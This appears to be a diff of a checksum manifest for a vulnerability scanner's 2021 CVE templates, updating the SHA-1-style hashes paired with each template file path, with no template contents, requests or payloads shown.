+http/cves/2021/CVE-2021-26812.yaml:177a2c3685bf0fd7d9c578f65004d1862803b836 +http/cves/2021/CVE-2021-26855.yaml:ec5e7d5b96efa2bae5d4b4840f0bf0ff9f8b1377 http/cves/2021/CVE-2021-27124.yaml:137797b7cfa1f25edb6c0036e3073723702310a7 -http/cves/2021/CVE-2021-27132.yaml:03c81dd2532f87a7b42ef4ea2b2af09fa1af1abb -http/cves/2021/CVE-2021-27309.yaml:a0bdd74f9183a10e990a8298d3b90345dd83ed9a -http/cves/2021/CVE-2021-27310.yaml:be75dbe4353f3957f15eff5b927505cc4ad762e7 +http/cves/2021/CVE-2021-27132.yaml:4dd2cac026403f9bf30989cf026835d96b6c61cf +http/cves/2021/CVE-2021-27309.yaml:0a2a5fbe1e0259d2ef12e038bacf6e92c69bd399 +http/cves/2021/CVE-2021-27310.yaml:888a8baccce99625a9582f48844f036b0609af90 http/cves/2021/CVE-2021-27314.yaml:330db402dff788cd9ec2003b09c7766e90a4a4a0 http/cves/2021/CVE-2021-27315.yaml:b9c4f69e54435581eb24bceea43d779f273d00e3 http/cves/2021/CVE-2021-27316.yaml:c5e2e8d5c9725ae8b0c8bbb8b5abe928a1c06cbf http/cves/2021/CVE-2021-27319.yaml:0d428759eff7f42222a8f93d4d473bdda6507f75 http/cves/2021/CVE-2021-27320.yaml:1a6d65bf4e2b7d1ee326e6deb03deba33e94047e -http/cves/2021/CVE-2021-27330.yaml:e900591b60f561f8edad22e468c89c482e41bf53 -http/cves/2021/CVE-2021-27358.yaml:f5e7d539b9a39719f4c72483a31bf0c8219b5e8f -http/cves/2021/CVE-2021-27519.yaml:fa83303ec7d244171520fc4f188ce047f0026322 -http/cves/2021/CVE-2021-27520.yaml:2aee80f2abf74e1779d9e3484a8653194435dec0 -http/cves/2021/CVE-2021-27561.yaml:2d5a6c05ade7d8ce193adb33128a4e7b5a91cc8b -http/cves/2021/CVE-2021-27651.yaml:4c65f15e774df73220ab1bdaa8055d4c832f7de6 -http/cves/2021/CVE-2021-27748.yaml:5ab336ed10589727b09f9d8edb7fba1c771eb6b5 -http/cves/2021/CVE-2021-27850.yaml:07bf163930db1c2b079bd8f6276e958d87f83a03 -http/cves/2021/CVE-2021-27905.yaml:8a8c076216830b2d0503de53c3fca2ced596c672 -http/cves/2021/CVE-2021-27909.yaml:7429b4a5c27063e13bbe0b34097f6b3ba18f4bd7 -http/cves/2021/CVE-2021-27931.yaml:e92b180420b3fbfd91e65988a0fe4ec59b55a353 -http/cves/2021/CVE-2021-28073.yaml:974a395dc40f2381a9fbf5e9112816653e02393a -http/cves/2021/CVE-2021-28149.yaml:6e00f8ba0ef96685621b24e4fb30e44e5c73b00e -http/cves/2021/CVE-2021-28150.yaml:ba15fac3c601cffcd7a00c45fdeb1cc4224970e4 -http/cves/2021/CVE-2021-28151.yaml:c2fd6f75882a8cdd57cf411816d3089838f84fcb -http/cves/2021/CVE-2021-28164.yaml:ab5fea26783a2bff67c8993be4f2eaa9e918bbe7 -http/cves/2021/CVE-2021-28169.yaml:ec9339fc7aeb15a2cbe7ed10ebcbd9935e16107a -http/cves/2021/CVE-2021-28377.yaml:a8de772a1798e704ac54bd77460a2857c4705c8f -http/cves/2021/CVE-2021-28419.yaml:55b2404be56f6ad7170a5d4bed04d650e69342fc -http/cves/2021/CVE-2021-28854.yaml:9f8fe4c59960b7f1557f90703eede13b31fddf1f -http/cves/2021/CVE-2021-28918.yaml:a6f5da5eee26e171a6640329a929a5fa58853ad5 -http/cves/2021/CVE-2021-28937.yaml:201b2e61474e400035bb09443b42bb776cd016a1 -http/cves/2021/CVE-2021-29156.yaml:d9d30b3a5c366bb061caca8cfbbd193d9d1c025d -http/cves/2021/CVE-2021-29203.yaml:a9b88e20456e3f7f6c3e4e0cc205f72626984d6f -http/cves/2021/CVE-2021-29441.yaml:1e28eea01fd9562490d8f5542e481e369befc17b -http/cves/2021/CVE-2021-29442.yaml:a85a41c86afdfca0a4416a6872911ea667d40dc0 -http/cves/2021/CVE-2021-29484.yaml:6c267d1bae9725dac5bc300d29a0e5c051358c11 -http/cves/2021/CVE-2021-29490.yaml:b02a0ba6ce9a18883c8e1aea40453e243febd73c -http/cves/2021/CVE-2021-29505.yaml:5332302fe60abf68b9d2314ed1add75dedbeaafa -http/cves/2021/CVE-2021-29622.yaml:7f4e9921052be64dcca4167381c1832fba77586a -http/cves/2021/CVE-2021-29625.yaml:16ad729bc94c73f0e96379019907ec7e9b99f414 -http/cves/2021/CVE-2021-3002.yaml:bdb170a8a01c7b0b386655e5101b638e7fcae76e -http/cves/2021/CVE-2021-30049.yaml:b0767116bd7d8fe2eb06387450bfdf409691c976 -http/cves/2021/CVE-2021-30128.yaml:2e025dfbaa47cdc994958905d4bcf66caadd9f48 -http/cves/2021/CVE-2021-30134.yaml:6ba062816bfa9045c6226e606c51429452781a99 -http/cves/2021/CVE-2021-30151.yaml:9b2af7e2a9eaa72d4851afed42fc3db15c15368e -http/cves/2021/CVE-2021-3017.yaml:654d86daf71a11198da48117d27cb3d73c56ef56 +http/cves/2021/CVE-2021-27330.yaml:b7f76cd403a8bcd05be3204df563a68a435bebf5 +http/cves/2021/CVE-2021-27358.yaml:872cd3af71a59eb603065b426137894e1ed27f39 +http/cves/2021/CVE-2021-27519.yaml:95e57240a2588e672b968e8db89ad8829dfa4b1f +http/cves/2021/CVE-2021-27520.yaml:3286a210fc852447e4ca091dabd8a2b21acd0be2 +http/cves/2021/CVE-2021-27561.yaml:855c08e6349fd588ff67faa095836f03e188dc1e +http/cves/2021/CVE-2021-27651.yaml:fd21561ee4da6b2225fd83aa8d909d6a5fc2e618 +http/cves/2021/CVE-2021-27748.yaml:6bd5e7d3d6c608542a279c7b3e5d4f7d0fb374df +http/cves/2021/CVE-2021-27850.yaml:290599314d38fbcb95933ebb6334a235aa28f43a +http/cves/2021/CVE-2021-27905.yaml:340db958f43e4196853464057f65ef2690aef7b7 +http/cves/2021/CVE-2021-27909.yaml:6c35a3ae6273a91ab10710f78771179daa88df0c +http/cves/2021/CVE-2021-27931.yaml:e7f7923bc6d209d07394f2b5643235eb1542c7ba +http/cves/2021/CVE-2021-28073.yaml:69f74fc3fb3eaaba2ff068f7b94fd56832f51386 +http/cves/2021/CVE-2021-28149.yaml:d8ff5c8c3a59a60351f44648b11f20d3da141faa +http/cves/2021/CVE-2021-28150.yaml:9135a9d8406143bbc87e7ba671bfeabe56889a3d +http/cves/2021/CVE-2021-28151.yaml:ca072b86f037ddd8069731551dc6bab62ceb0a4d +http/cves/2021/CVE-2021-28164.yaml:b2c90ca49c2e4f1c484080e96776e9c6515e1b0e +http/cves/2021/CVE-2021-28169.yaml:4db9ff86311716321db1d1c79a8fa8b0eb706b59 +http/cves/2021/CVE-2021-28377.yaml:47882b98a3f12ca6172b5690e8700a5c274e7d7e +http/cves/2021/CVE-2021-28419.yaml:8cf23f5ecf140de0e606e1734e703f5749d45e90 +http/cves/2021/CVE-2021-28854.yaml:14839b5069b5fe02be759b2f2aa2c5fcf2e4a9d4 +http/cves/2021/CVE-2021-28918.yaml:356c079b7763b9c1ca0542ccdce60afa515365c3 +http/cves/2021/CVE-2021-28937.yaml:ad12f6ee70b5add7e9635b6aae8a8723b9d2fd85 +http/cves/2021/CVE-2021-29156.yaml:131e875e24d945ca72c18a475c789f88eedf71a6 +http/cves/2021/CVE-2021-29203.yaml:b3e7bd79eb4f4a2d086d5c39d427112d30d23b6b +http/cves/2021/CVE-2021-29441.yaml:98d49591c92a27e0275552950518f2a59a0820b6 +http/cves/2021/CVE-2021-29442.yaml:8cc4be99cc67fba5ae2f061ec7e3c9b0b39bf484 +http/cves/2021/CVE-2021-29484.yaml:f8051d4b9dbd13fd0504bacc2bd09fa4ef6df25e +http/cves/2021/CVE-2021-29490.yaml:ecae4306799bd93b5038046e64b2ed0f7330c1af +http/cves/2021/CVE-2021-29505.yaml:43231133277c07c5ba7704f5c85e1d627ad0875b +http/cves/2021/CVE-2021-29622.yaml:f5361936f134e154794a6074f18e9e65b2856adb +http/cves/2021/CVE-2021-29625.yaml:2457a5a435c034517efa6c27763769a699a6f728 +http/cves/2021/CVE-2021-3002.yaml:9bc91624a0c19a97931181b558b0f7f012aa7f30 +http/cves/2021/CVE-2021-30049.yaml:6a8d6a181bea32108019abf97d1e01f2c05538d5 +http/cves/2021/CVE-2021-30128.yaml:66a6e6fef48d5442a007405156b1f4e5011f77dc +http/cves/2021/CVE-2021-30134.yaml:a44cf3d356f5d5d6fa657d2ea668872f5ebde5c2 +http/cves/2021/CVE-2021-30151.yaml:79d3e797f7765485ebd55cfb73ddc9a4b1e11c6e +http/cves/2021/CVE-2021-3017.yaml:a3ab4450b511e67f348a9f240a35523a49d33821 http/cves/2021/CVE-2021-30175.yaml:190495b81f869cb64fa0b635825c5c72c99bd928 -http/cves/2021/CVE-2021-3019.yaml:67797feca0cd8b11fa39f4cdb384aaad0edb96a8 -http/cves/2021/CVE-2021-30213.yaml:9ebeb237f2127162b44f108b5b8a3039cfec400a -http/cves/2021/CVE-2021-30461.yaml:2160800bff13da52c99258c012831a0d229d788f -http/cves/2021/CVE-2021-30497.yaml:e9e2230811a86b0e8d4f40be306e5f242ccf5b4e -http/cves/2021/CVE-2021-3110.yaml:0d0197f4f1fb02d89f0eae3e1f2a3e972d4e162e -http/cves/2021/CVE-2021-31195.yaml:c155715be346b1e5b328050341fd364a985d1534 -http/cves/2021/CVE-2021-31249.yaml:962ee355a4ceff3857f2c808ac51a5d662065fe7 -http/cves/2021/CVE-2021-31250.yaml:14f9a3eef10c3995bc08084c484d28528510c75e -http/cves/2021/CVE-2021-3129.yaml:2067cf11cddf75b31ec9e7f55486f4004ec8e510 -http/cves/2021/CVE-2021-31537.yaml:865084c01fc9b902af671fa9c1158ef596580b0a -http/cves/2021/CVE-2021-31581.yaml:6ae98f8c1703a5ca0fb5a2a3a410265678136968 -http/cves/2021/CVE-2021-31589.yaml:9f8344ec599d3db05cb864e00d2f203b92a69966 -http/cves/2021/CVE-2021-31602.yaml:2fe63a82c9afa4b396a3907ca6dec0573213690c -http/cves/2021/CVE-2021-31682.yaml:3c54cef88fd27e2b670604eb9d8af87a9201c8a4 -http/cves/2021/CVE-2021-31755.yaml:1674f7d508f5ddb37bb0932842a152f3638a0330 -http/cves/2021/CVE-2021-31805.yaml:cf7255db427a6df58389d0a80d2b8164698962df -http/cves/2021/CVE-2021-31856.yaml:d70bd8f3902ed4033dce5e83fa8b0cc9affc4669 -http/cves/2021/CVE-2021-31862.yaml:560acd99b9d04204e366db3b4b2b884bac984147 -http/cves/2021/CVE-2021-32030.yaml:8195824d1e8c339b5d13b0d1a1d73a4abf84c7c1 -http/cves/2021/CVE-2021-32172.yaml:e53a29308fd7a37ce875c18740c0068a5f38d836 -http/cves/2021/CVE-2021-3223.yaml:fe3f37319003d1090ecca93aeff9cdd227f5322a -http/cves/2021/CVE-2021-32305.yaml:9a022e91582b0bf1404c19e8fe88863ef96ff551 -http/cves/2021/CVE-2021-32618.yaml:7af9291e62fc0e03bfc43ac0e437c5d3a0938d8d -http/cves/2021/CVE-2021-32682.yaml:9be7bedae9ec801950fb5dda87a97cb30842819d -http/cves/2021/CVE-2021-32789.yaml:31dcdc5cf2ad4a66034bc87c30a4bf39ce8a0227 -http/cves/2021/CVE-2021-32819.yaml:1fbb8137b1831572902d7931d386b381365e28e9 -http/cves/2021/CVE-2021-32820.yaml:e1399b95277a6f646e08d3dd8b9562bb5e54109d -http/cves/2021/CVE-2021-32853.yaml:193cc6cae477611e28d6b6c748c4304e7c9eafab -http/cves/2021/CVE-2021-3293.yaml:30a550bfa26722a6e658704fff30a6dec050ad32 -http/cves/2021/CVE-2021-3297.yaml:ec665442b1e26d9d4aec24749b06be9cc510706e -http/cves/2021/CVE-2021-33044.yaml:2c5c606c421e36daa492fce9cf9d961ee7012efe -http/cves/2021/CVE-2021-33221.yaml:54c5f7742b9db03fa5616198de8f4aa3633486be -http/cves/2021/CVE-2021-33357.yaml:d1f36e3c4bb693f72d981b4985c8de300638d024 -http/cves/2021/CVE-2021-33544.yaml:0aa3b348ba2e10735b7deb629ce1d1e61008b85e -http/cves/2021/CVE-2021-33564.yaml:56c6f3cecf2db0cf41c42370849ff01b830f801c -http/cves/2021/CVE-2021-3374.yaml:facef627d497f44cc8cf413903009ff234246d58 -http/cves/2021/CVE-2021-3377.yaml:7cd4dc5a07ca12c2410508d98a6f2ce631b33e3f +http/cves/2021/CVE-2021-3019.yaml:3a4c23278a327b240ac0193d4bc9b592ea63c8ba +http/cves/2021/CVE-2021-30213.yaml:e3368ab0f1b6cbe409e2813560166002070d52e8 +http/cves/2021/CVE-2021-30461.yaml:9c522c82a4d6a864ebd90220cf6dfd022a9b52f5 +http/cves/2021/CVE-2021-30497.yaml:6a2fddfb473524b7fa5b52d50ca7183ad397505c +http/cves/2021/CVE-2021-3110.yaml:234f0e977dae9d4d4ad7d8c6342195c3b8d80ead +http/cves/2021/CVE-2021-31195.yaml:8abee8d1bb09e56838dea78e9733e23e2bb52f10 +http/cves/2021/CVE-2021-31249.yaml:ac5977eb104b2f15025f55242c2d9570a14d85bc +http/cves/2021/CVE-2021-31250.yaml:04beb03752ba08c04883b5cc3ae6e9ad83b8aef8 +http/cves/2021/CVE-2021-3129.yaml:3ccae5867a46a8f210a3c6c1835426e68154049a +http/cves/2021/CVE-2021-31537.yaml:60d02e0c56a69dd29ffaffaaa784b2c09a22a867 +http/cves/2021/CVE-2021-31581.yaml:381a9d52471ca6846aeab408377cddf3646dfe27 +http/cves/2021/CVE-2021-31589.yaml:fd5e7525285b9615cdffdd1b79eda076ab696d2c +http/cves/2021/CVE-2021-31602.yaml:b16267ea25e9f6f9d6c137ca4f031a76479f4934 +http/cves/2021/CVE-2021-31682.yaml:3c6d3274613b0be2f982c48926c1bcbc7b7ba25a +http/cves/2021/CVE-2021-31755.yaml:80e4e0159d026eea481eea87b388352310c6ecfe +http/cves/2021/CVE-2021-31805.yaml:c3112d8ef0a1bb4c417eb09735d087a2a8b634bc +http/cves/2021/CVE-2021-31856.yaml:221f9ae54c6c757cef7ca44280c0f7f64dae6568 +http/cves/2021/CVE-2021-31862.yaml:09ec46fee5b982be057d529ed3b94dbad0d52982 +http/cves/2021/CVE-2021-32030.yaml:189e31deca1c1861d15009f0827b1d07185fc190 +http/cves/2021/CVE-2021-32172.yaml:73a395271e03cb189576fd77d268e70b08608a4e +http/cves/2021/CVE-2021-3223.yaml:b0e8dbd17323dadf3c80c8d2cfa5d17a07434f1d +http/cves/2021/CVE-2021-32305.yaml:10a1de39b3dd9c32769bf30d19af380f629c2d13 +http/cves/2021/CVE-2021-32618.yaml:a19d58d5392e9349b891bc1e079d3a4430a3cb79 +http/cves/2021/CVE-2021-32682.yaml:9da634e5446af3ffa03849ba5f4f159842384ddd +http/cves/2021/CVE-2021-32789.yaml:b2e1c38a07355b8fc2905f3f45fd3f1e59080900 +http/cves/2021/CVE-2021-32819.yaml:db95511614acc794bad61c45d8d8a465ac72cc55 +http/cves/2021/CVE-2021-32820.yaml:70d128206695a6c0e5f39afd107464e958f416a3 +http/cves/2021/CVE-2021-32853.yaml:785fc2d03c54260539571efa4de3b52dd2e72f3a +http/cves/2021/CVE-2021-3293.yaml:3241dd143a207d28f9f53c98e73aa68751f8d6c5 +http/cves/2021/CVE-2021-3297.yaml:791b35effdb0452b9c7aa518bb66714036217f9b +http/cves/2021/CVE-2021-33044.yaml:113d3f6e7e775dbaf1eda2ca543c0329e614114b +http/cves/2021/CVE-2021-33221.yaml:63bda66e4a03169081c223f487ecb38cb1bbafee +http/cves/2021/CVE-2021-33357.yaml:02b1b4315168a5caabae39dc591b7c54dbcb88ce +http/cves/2021/CVE-2021-33544.yaml:5a276301092cc641d3b83ae553b1a1861138717d +http/cves/2021/CVE-2021-33564.yaml:cb3495882030435dbb83054ff5b8f58a6a80fcd6 +http/cves/2021/CVE-2021-3374.yaml:10f61e1e5441353bc57920b8c4c01ae2c8401359 +http/cves/2021/CVE-2021-3377.yaml:14929db6c394df020acb970c9e246f00cae90256 http/cves/2021/CVE-2021-3378.yaml:bbd1c8c22b0e4bafd0033a3bc0338954b8f1403b -http/cves/2021/CVE-2021-33807.yaml:8fcea17e43a0575f3ace34f3964739d90ab93528 -http/cves/2021/CVE-2021-33851.yaml:d15375c56b3bac11326997f938348d6dfc673405 -http/cves/2021/CVE-2021-33904.yaml:d58da06905672e7c3d214c6df99ec5ba7e4c43b2 -http/cves/2021/CVE-2021-34370.yaml:08e12de14fc2ab4563b11a53c4dba03bbeffd50e -http/cves/2021/CVE-2021-34429.yaml:39856bf5de84ab25f82f4720f8ffc94dfc4d96eb -http/cves/2021/CVE-2021-34473.yaml:bf65176c0d9f07304ded2eee727778694e32e89f -http/cves/2021/CVE-2021-34621.yaml:1cd245c18c69632335e1707a533f8e3e88f22bf2 -http/cves/2021/CVE-2021-34640.yaml:ba305b82f1cae91ea197b37c6738ce636af52cd4 -http/cves/2021/CVE-2021-34643.yaml:c82c0ff3a84d104e0ad6d864c1e1cc3fdb270496 -http/cves/2021/CVE-2021-34805.yaml:2f88c19bb81fb6478937730429899c79fd99e4ae -http/cves/2021/CVE-2021-35250.yaml:0e8ae74f1cee4ab737a637922e24cab17936b504 -http/cves/2021/CVE-2021-35265.yaml:12b8bd962e5bce56c4678e830391f7f0bc409977 -http/cves/2021/CVE-2021-35336.yaml:8f80f32a8d90699d765b5b4c600d19b9f5915580 -http/cves/2021/CVE-2021-35380.yaml:d889dd64a4e3234b49c63d0f3d141aeb3ae70e0a -http/cves/2021/CVE-2021-35464.yaml:e990377d429daa3541235e031221660eaf7475cb -http/cves/2021/CVE-2021-35488.yaml:1e96c8052d5a0b9a8907893cbe7a327b81c1d8df -http/cves/2021/CVE-2021-35587.yaml:56c42a0887da02ed2b2dc632d7eb6eec2a2500bb -http/cves/2021/CVE-2021-3577.yaml:8a0feeefeb32b26df92bbd2697b24901dff7df53 -http/cves/2021/CVE-2021-36260.yaml:c60b8bf65eb603563b01d4691ad640ef3a393de5 -http/cves/2021/CVE-2021-36356.yaml:ec6e9724d2bb6065e1bde7d82a49bcc7a716e365 -http/cves/2021/CVE-2021-36380.yaml:4c8a94704c6f010156fac40ab817bb239a6d7013 -http/cves/2021/CVE-2021-36450.yaml:3833dd6a42b2ca33bb0c6a1dbb598bdde4c7bbfd -http/cves/2021/CVE-2021-3654.yaml:7e1d54d2842cd4128a147d4c7bed1299dab66068 -http/cves/2021/CVE-2021-36580.yaml:7e3ca62c123edd3ccda7028708ce58fd73b49ff7 -http/cves/2021/CVE-2021-36748.yaml:d95d1d8a451ed92db10c02e56bfe09520c0f2932 -http/cves/2021/CVE-2021-36749.yaml:0707320c97a58337e2cb0ed86ea487b1771c9df5 -http/cves/2021/CVE-2021-36873.yaml:e886f6a22f1687fd263a15a30d35023acc4bc3a0 -http/cves/2021/CVE-2021-37216.yaml:1be0aaf902c17fb70de891302cadf570211675ca +http/cves/2021/CVE-2021-33807.yaml:3fde98e5af0b21c295ac9512e669cbda4afb2c0c +http/cves/2021/CVE-2021-33851.yaml:53b5b0ffb9eaedeefd27901b308d824210033235 +http/cves/2021/CVE-2021-33904.yaml:9511ef9fa4a3ddaad514c259ad44df8d04b37d7d +http/cves/2021/CVE-2021-34370.yaml:879c9779044db298e7d17adf02572781a6677d84 +http/cves/2021/CVE-2021-34429.yaml:b1d89d99f4866db4298c9543154ce3cbfe817fda +http/cves/2021/CVE-2021-34473.yaml:696d0871d52b8e84cd478343283bee65a03ba0c5 +http/cves/2021/CVE-2021-34621.yaml:d27e926300c7271f52384e2ec5606204b29b5491 +http/cves/2021/CVE-2021-34640.yaml:95d134d958265ccde8bbd145ee9dbe01075eb39d +http/cves/2021/CVE-2021-34643.yaml:8df1958c9154e1a7bd66edba5ecfba87ff3c9a0b +http/cves/2021/CVE-2021-34805.yaml:3c0bf12e54bc9954c79903d88d873adab6b64fc0 +http/cves/2021/CVE-2021-35250.yaml:43c41e36ed96bc6eb24a617afad3e85424ca34f9 +http/cves/2021/CVE-2021-35265.yaml:3288674d637da200f1b0fbf735db5ba90cdd1573 +http/cves/2021/CVE-2021-35336.yaml:1508588b4bcb5917ecd255b533ef691f89bbb531 +http/cves/2021/CVE-2021-35380.yaml:cd865c58a8a014ef715f3418cc0dbad443674a45 +http/cves/2021/CVE-2021-35464.yaml:92154293810f5e5955ce876f6ba62e352257b3ff +http/cves/2021/CVE-2021-35488.yaml:8237acbc8a88d0237c79880da1989512e0d5d5d9 +http/cves/2021/CVE-2021-35587.yaml:dbc7a9b853d937711fb8ff582367096a31f1e8ff +http/cves/2021/CVE-2021-3577.yaml:8950a469782dc3798d997ff9c0752ccce1d834d9 +http/cves/2021/CVE-2021-36260.yaml:17da9872a08e324e1a06c6a1b504a46b09114a1e +http/cves/2021/CVE-2021-36356.yaml:33ce9242b22b683983901e345bf61b8f19b1a6a7 +http/cves/2021/CVE-2021-36380.yaml:180b74d45ca7663e9b5cece85c83d5df2f3b8e7f +http/cves/2021/CVE-2021-36450.yaml:7e4a062f6e35b2ba12175590db063b69fcc66fdb +http/cves/2021/CVE-2021-3654.yaml:bc9e1f4852651fc5335a343e11fd7eb175bec04f +http/cves/2021/CVE-2021-36580.yaml:e166a4362f355ed40a3b50a0e7b8ebd20d431a03 +http/cves/2021/CVE-2021-36748.yaml:d2318a900c7d1d15aaa1fe6c0d0d0599ba872644 +http/cves/2021/CVE-2021-36749.yaml:857873117c2721663a1b89ebab91fd5971f6abce +http/cves/2021/CVE-2021-36873.yaml:f10839730193f295e9eda67ec16b278503466513 +http/cves/2021/CVE-2021-37216.yaml:71f9b8847fb80266c5a336d61527e0223a0a0e4d http/cves/2021/CVE-2021-37304.yaml:4ec90341b1edc55e7bf5e12ad7fd9cebda6d4b8f http/cves/2021/CVE-2021-37305.yaml:31785f615ed5121225dd6c06ec0f603ab73a6f60 -http/cves/2021/CVE-2021-37416.yaml:1ceb60fbd02f8d613169df89b71adbe247cc7cf6 -http/cves/2021/CVE-2021-37538.yaml:bdf618dacb946f89877dba17be36b8a8129cb74c -http/cves/2021/CVE-2021-37573.yaml:bf029d199e3b2a8b57406f3ffc0bf41c24d55ee6 -http/cves/2021/CVE-2021-37580.yaml:f9100c9db8f1805797e80e8a4b556a369b6e1643 -http/cves/2021/CVE-2021-37589.yaml:6f14088d3b0759892dfdca968a614c0e24740aae -http/cves/2021/CVE-2021-37704.yaml:99cffe4638d7c916335b025c6f9e6af7438390d9 -http/cves/2021/CVE-2021-37833.yaml:10c873adabbec11db1db9d9dbf91f20d768d82de -http/cves/2021/CVE-2021-38314.yaml:95e29f1eb7796ceded24d412a79911f4892a820f -http/cves/2021/CVE-2021-38540.yaml:04e94e40e55e2f69b983c7dc9f1322e8f6bc9714 -http/cves/2021/CVE-2021-38647.yaml:c6010a60e670f83ce7dce1c2f6a0edb3f6c59223 -http/cves/2021/CVE-2021-38702.yaml:c6415bd08408c49173807489963d264b9eac22ed -http/cves/2021/CVE-2021-38704.yaml:9ed95715db1851ffd95c0b88f783808be0165bfc -http/cves/2021/CVE-2021-38751.yaml:2c55c28ac364fbb961082aa28532ca26e6911cd3 -http/cves/2021/CVE-2021-39141.yaml:f09ad9235d7bd038860e8c9db52f7d05b0661b17 -http/cves/2021/CVE-2021-39144.yaml:8412d45b21eae50f7e1d19e8bb8e7e47fb2897e4 -http/cves/2021/CVE-2021-39146.yaml:0e6315d0d0b8aaadfc26c7e07a9a20a8a8812ca2 -http/cves/2021/CVE-2021-39152.yaml:c89141178cdbb1c06d29e6fb1e9a040472e373b0 +http/cves/2021/CVE-2021-37416.yaml:eb24aafa22d777f85ce6fbf9d9ef566beb0b79c6 +http/cves/2021/CVE-2021-37538.yaml:4b111662cbda7034818f58ca59ec2a1dcf51be03 +http/cves/2021/CVE-2021-37573.yaml:ce0270764598bc7620454c0568f9a4a090640131 +http/cves/2021/CVE-2021-37580.yaml:20f53008e70581ae8c901c03660a26e24fc70c81 +http/cves/2021/CVE-2021-37589.yaml:52566692ba8669a689304b585deac3fb8adf47e8 +http/cves/2021/CVE-2021-37704.yaml:d4b4e77d7922b89c316b67d5ba68df304e052751 +http/cves/2021/CVE-2021-37833.yaml:fd98997eaeee7b98f8c7168c9ef92c0066de5d1f +http/cves/2021/CVE-2021-38314.yaml:f44a132f40134e8eb1cbf6ff75ed33da0aa205c6 +http/cves/2021/CVE-2021-38540.yaml:6e86b329190929725436bfc7e011a95d8cbfced4 +http/cves/2021/CVE-2021-38647.yaml:cae98c08f16d7ef4145696fe1e7c963b6440efba +http/cves/2021/CVE-2021-38702.yaml:e1924cd05d6574c42edd4390611fe4c07eeec477 +http/cves/2021/CVE-2021-38704.yaml:dc65e0bc93b19e40e1be943868b0a6e572700f71 +http/cves/2021/CVE-2021-38751.yaml:a36abb782f3062483e65dc7c44f0d24afcebd907 +http/cves/2021/CVE-2021-39141.yaml:6ae925c3957c1d1f30bd934dd92b797061f89911 +http/cves/2021/CVE-2021-39144.yaml:c859eddc5f3077251e22d8c66578958a446ea1ff +http/cves/2021/CVE-2021-39146.yaml:c6ff63439d06fc01eefa7b74cbcb51684fb3e374 +http/cves/2021/CVE-2021-39152.yaml:945e21097d38a47197e5ccfdb0cf5c7492a8e05e http/cves/2021/CVE-2021-39165.yaml:bf9f6cf3ab3e0f4139dfb206927dacb942337a3a -http/cves/2021/CVE-2021-39211.yaml:7d9e5216cd26dca45fb6056cc2fbd6cd32550909 -http/cves/2021/CVE-2021-39226.yaml:7ba75d1be9576a096821b38703aa7a1fa67b0cad -http/cves/2021/CVE-2021-39312.yaml:e97334f0d88c1fc3bf29ca61947b0dcb4c3a2e74 -http/cves/2021/CVE-2021-39316.yaml:3ea6eeee5568607b7c706f57b05cb14c762a2a40 -http/cves/2021/CVE-2021-39320.yaml:9b99e8e9420141237c8afe4b6b42cca9994402b9 -http/cves/2021/CVE-2021-39322.yaml:4c8c1951e0a2ea0b01572b6b04fbf720dd5cffe9 -http/cves/2021/CVE-2021-39327.yaml:4d0b0867fed57205cbda7408b1a7952621bfebf3 -http/cves/2021/CVE-2021-39350.yaml:9b59da2ff9824f5501b754efd34c1d5311a9316d -http/cves/2021/CVE-2021-39433.yaml:dd22a28f5d688a92e715a4370e21af977118bc02 -http/cves/2021/CVE-2021-39501.yaml:6c8a285530f1c6bd9d4f95ddb5275ac683f362e6 -http/cves/2021/CVE-2021-40149.yaml:fc9f77e55f246f0b697164a9bb6796460ad3386e -http/cves/2021/CVE-2021-40150.yaml:7fdea5ba4dac2429f82ca4c94c049dedd90930ec -http/cves/2021/CVE-2021-40323.yaml:f413121168d9c1bd12cb1446b31e3ec8fad4207f -http/cves/2021/CVE-2021-40438.yaml:efb9a12bc9809dc844988e4a62841be47b832e2c -http/cves/2021/CVE-2021-40539.yaml:79009fd1b52b7a2ff6438fb068ab8193d4e83589 -http/cves/2021/CVE-2021-40542.yaml:5edac6cd4ca0edcdd24de9ac64ed806b4b1c0a97 -http/cves/2021/CVE-2021-40661.yaml:a5399ac44a7097c712ba2d2d3c7cc787ad32e657 -http/cves/2021/CVE-2021-40822.yaml:8e429517b1540bb93bb1ac178c2c1f91dcf225d7 -http/cves/2021/CVE-2021-40856.yaml:e71f6b3d5bb5b3894dd5b99712333c41b9932183 -http/cves/2021/CVE-2021-40859.yaml:9fcdfbaa143fae8dfb69fbd4af6a66121b4a91d8 -http/cves/2021/CVE-2021-40868.yaml:5b049bfbb5845494babb82418eafa9f63b717e0d -http/cves/2021/CVE-2021-40870.yaml:c90acb6e3febebc49c06d8091d945db256093462 -http/cves/2021/CVE-2021-40875.yaml:d9dbf6e349e00511eee8e27c3c5e6f7e61bdb1ab +http/cves/2021/CVE-2021-39211.yaml:ff960f9b7b2bea8b68bc90ad2839de9819c4813a +http/cves/2021/CVE-2021-39226.yaml:1897b5ebc19509c0af26e170fe50ef02ac3a136e +http/cves/2021/CVE-2021-39312.yaml:7e1b3761c2209979147fc7d934862112fcad61a6 +http/cves/2021/CVE-2021-39316.yaml:12e4639bfa229cf00f72f2de57d9b06fd881401b +http/cves/2021/CVE-2021-39320.yaml:f6ee8eac4b982bdd77fbf88a59162902304eb751 +http/cves/2021/CVE-2021-39322.yaml:a64e89b4ac3c874474cf20e56d62f0ad1ab629dd +http/cves/2021/CVE-2021-39327.yaml:262fc10176b67273ab3baf6b7a7fe953bc20861b +http/cves/2021/CVE-2021-39350.yaml:7bfc72705e7485b87721719f36b905bc26068886 +http/cves/2021/CVE-2021-39433.yaml:ad40ad5df68b550e26481ace83717379ccaea645 +http/cves/2021/CVE-2021-39501.yaml:fcbc7ac01bba4187b0e666ffaf4e7555467502e8 +http/cves/2021/CVE-2021-40149.yaml:a966d5f60c78ae974baf0c5f7b3e02aec785475a +http/cves/2021/CVE-2021-40150.yaml:c78eddc4bd196d3c180df242cc0296e06401fd73 +http/cves/2021/CVE-2021-40323.yaml:99ec90e20e263345eaf004f9bd0f490a8ff5c964 +http/cves/2021/CVE-2021-40438.yaml:169921e758d4a151bc7cca36d0e33c463a89543e +http/cves/2021/CVE-2021-40539.yaml:dad05a7eaabc5e414cc407476ee7b439c7c6cdc5 +http/cves/2021/CVE-2021-40542.yaml:60bbecf2d7da28063a257e0de65f8de3896c684a +http/cves/2021/CVE-2021-40661.yaml:ff32d9298e283c077da097ec33196aaaa93998ad +http/cves/2021/CVE-2021-40822.yaml:ec92bf2111c015834ec868d515494b12c471031e +http/cves/2021/CVE-2021-40856.yaml:ca29175e007fd36f08d81b6ceda4a3c1aac671c9 +http/cves/2021/CVE-2021-40859.yaml:19c799c069fbff4464e1f57d84e93f37f33f0d60 